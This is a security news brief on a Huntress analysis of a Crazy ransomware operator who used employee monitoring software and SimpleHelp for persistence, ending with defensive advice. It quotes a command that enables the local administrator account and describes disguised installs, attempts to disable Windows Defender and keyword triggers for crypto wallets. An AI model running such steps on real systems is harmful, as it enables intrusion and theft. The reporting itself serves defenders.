A member of the Crazy ransomware gang used employee monitoring software and the SimpleHelp remote support tool to maintain persistence and prepare ransomware deployment across multiple corporate breaches, a technical analysis by Huntress reported.
KEY FACTS
- Tools abused Net Monitor for Employees Professional and SimpleHelp used for remote access
- Installation methods Net Monitor via msiexec and SimpleHelp via PowerShell with disguised filenames
- Persistence steps Attempts to enable local administrator account and disable Windows Defender
- Initial access Compromised SSL VPN credentials and only one observed ransomware deployment
Attackers installed Net Monitor for Employees Professional using msiexec.exe, deploying the monitoring agent directly from the developer site. SimpleHelp was downloaded and installed with PowerShell, sometimes using filenames that mimicked Visual Studio or OneDrive binaries.
The monitoring agent allowed remote viewing of desktops, file transfers, and command execution. Operators configured rules to trigger on cryptocurrency related activity and on remote management tool keywords, with examples including metamask, exodus, binance, etherscan, RDP, anydesk, and teamview.
For redundancy attackers attempted to enable the local administrator account using the command net user administrator /active:yes. They also tried to stop and remove Windows Defender services and kept multiple remote access channels to retain access if one tool was removed.
Only one incident led to deployment of Crazy ransomware, while another intrusion shared the same vhost.exe filename and overlapping command and control infrastructure, indicating a likely single operator or group. Both breaches began after compromised SSL VPN credentials were used, and organizations were advised to monitor for unauthorized remote monitoring and support tools and to enforce multifactor authentication.
WHY IT MATTERS
Legitimate remote management tools can let attackers blend in with normal activity and maintain long term access. Monitoring installations of such tools and enforcing multifactor authentication on remote access services reduces the risk of similar intrusions.